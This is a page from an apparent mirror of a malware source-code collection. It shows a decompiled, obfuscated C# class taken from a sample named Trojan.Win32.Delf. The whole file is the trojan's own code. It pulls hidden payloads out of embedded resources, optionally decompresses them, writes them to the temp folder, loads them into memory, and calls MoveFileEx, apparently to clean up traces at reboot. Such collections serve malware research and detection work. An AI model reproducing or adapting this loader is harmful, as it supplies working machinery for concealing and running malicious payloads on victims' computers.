mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-20 00:58:52 +00:00
f2ac1ece55
add
181 lines
6.0 KiB
C#
181 lines
6.0 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
|
||
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
|
||
|
||
using \u0002;
|
||
using System;
|
||
using System.IO;
|
||
using System.Reflection;
|
||
using System.Runtime.InteropServices;
|
||
using System.Text;
|
||
|
||
namespace \u0002
|
||
{
|
||
internal class \u0002
|
||
{
|
||
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
|
||
private static extern bool \u0003([In] string obj0, [In] string obj1, [In] int obj2);
|
||
|
||
internal static Assembly \u0003([In] object obj0, [In] ResolveEventArgs obj1)
|
||
{
|
||
\u0002.\u0002.\u0001 obj = new \u0002.\u0002.\u0001(obj1.Name);
|
||
string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0003(false)));
|
||
string[] strArray = \u0001.\u0001.\u0003(43002).Split(',');
|
||
string name = string.Empty;
|
||
bool flag1 = false;
|
||
bool flag2 = false;
|
||
bool flag3 = false;
|
||
for (int index = 0; index < strArray.Length - 1; index += 2)
|
||
{
|
||
if (strArray[index] == base64String)
|
||
{
|
||
name = strArray[index + 1];
|
||
if (name[0] == '[')
|
||
{
|
||
int num = name.IndexOf(']');
|
||
string str = name.Substring(1, num - 1);
|
||
flag1 = str.IndexOf('z') >= 0;
|
||
flag2 = str.IndexOf('g') >= 0;
|
||
flag3 = str.IndexOf('t') >= 0;
|
||
name = name.Substring(num + 1);
|
||
break;
|
||
}
|
||
break;
|
||
}
|
||
}
|
||
if (name.Length > 0)
|
||
{
|
||
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
|
||
if (manifestResourceStream != null)
|
||
{
|
||
int length = (int) manifestResourceStream.Length;
|
||
byte[] numArray = new byte[length];
|
||
manifestResourceStream.Read(numArray, 0, length);
|
||
if (flag1)
|
||
numArray = \u0002.\u0001.\u0003(numArray);
|
||
if (flag2)
|
||
{
|
||
try
|
||
{
|
||
string path1 = string.Format(\u0001.\u0001.\u0003(43220), (object) Path.GetTempPath(), (object) name);
|
||
Directory.CreateDirectory(path1);
|
||
string path2 = path1 + obj.\u0001 + \u0001.\u0001.\u0003(43233);
|
||
if (!File.Exists(path2))
|
||
{
|
||
Assembly assembly = (Assembly) null;
|
||
FileStream fileStream = File.OpenWrite(path2);
|
||
fileStream.Write(numArray, 0, numArray.Length);
|
||
fileStream.Close();
|
||
if (\u0003.\u0003(path2) == 0)
|
||
assembly = Assembly.Load(obj.\u0003(true));
|
||
File.Delete(path2);
|
||
Directory.Delete(path1);
|
||
if ((object) assembly != null)
|
||
return assembly;
|
||
}
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
Assembly assembly1 = (Assembly) null;
|
||
if (!flag3)
|
||
{
|
||
try
|
||
{
|
||
assembly1 = Assembly.Load(numArray);
|
||
}
|
||
catch (FileLoadException ex)
|
||
{
|
||
flag3 = true;
|
||
}
|
||
catch (BadImageFormatException ex)
|
||
{
|
||
flag3 = true;
|
||
}
|
||
}
|
||
if (flag3)
|
||
{
|
||
try
|
||
{
|
||
string path3 = string.Format(\u0001.\u0001.\u0003(43220), (object) Path.GetTempPath(), (object) name);
|
||
Directory.CreateDirectory(path3);
|
||
string path4 = path3 + obj.\u0001 + \u0001.\u0001.\u0003(43233);
|
||
if (!File.Exists(path4))
|
||
{
|
||
FileStream fileStream = File.OpenWrite(path4);
|
||
fileStream.Write(numArray, 0, numArray.Length);
|
||
fileStream.Close();
|
||
\u0002.\u0002.\u0003(path4, (string) null, 4);
|
||
\u0002.\u0002.\u0003(path3, (string) null, 4);
|
||
}
|
||
assembly1 = Assembly.LoadFile(path4);
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
return assembly1;
|
||
}
|
||
}
|
||
return (Assembly) null;
|
||
}
|
||
|
||
internal struct \u0001
|
||
{
|
||
public string \u0001;
|
||
public Version \u0001;
|
||
public string \u0002;
|
||
public string \u0003;
|
||
|
||
public string \u0003([In] bool obj0)
|
||
{
|
||
StringBuilder stringBuilder = new StringBuilder();
|
||
stringBuilder.Append(this.\u0001);
|
||
if (obj0)
|
||
{
|
||
stringBuilder.Append(\u0001.\u0001.\u0003(43242));
|
||
stringBuilder.Append((object) this.\u0001);
|
||
}
|
||
stringBuilder.Append(\u0001.\u0001.\u0003(43259));
|
||
stringBuilder.Append(this.\u0002.Length == 0 ? \u0001.\u0001.\u0003(43276) : this.\u0002);
|
||
stringBuilder.Append(\u0001.\u0001.\u0003(43289));
|
||
stringBuilder.Append(this.\u0003.Length == 0 ? \u0001.\u0001.\u0003(43314) : this.\u0003);
|
||
return stringBuilder.ToString();
|
||
}
|
||
|
||
public \u0001([In] string obj0)
|
||
{
|
||
this.\u0001 = new Version();
|
||
this.\u0002 = string.Empty;
|
||
this.\u0003 = string.Empty;
|
||
this.\u0001 = string.Empty;
|
||
string str1 = obj0;
|
||
char[] chArray = new char[1]{ ',' };
|
||
foreach (string str2 in str1.Split(chArray))
|
||
{
|
||
string str3 = str2.Trim();
|
||
if (str3.StartsWith(\u0001.\u0001.\u0003(43323)))
|
||
this.\u0001 = new Version(str3.Substring(8));
|
||
else if (str3.StartsWith(\u0001.\u0001.\u0003(43336)))
|
||
{
|
||
this.\u0002 = str3.Substring(8);
|
||
if (this.\u0002 == \u0001.\u0001.\u0003(43276))
|
||
this.\u0002 = string.Empty;
|
||
}
|
||
else if (str3.StartsWith(\u0001.\u0001.\u0003(43349)))
|
||
{
|
||
this.\u0003 = str3.Substring(15);
|
||
if (this.\u0003 == \u0001.\u0001.\u0003(43314))
|
||
this.\u0003 = string.Empty;
|
||
}
|
||
else
|
||
this.\u0001 = str3;
|
||
}
|
||
}
|
||
}
|
||
}
|
||
}
|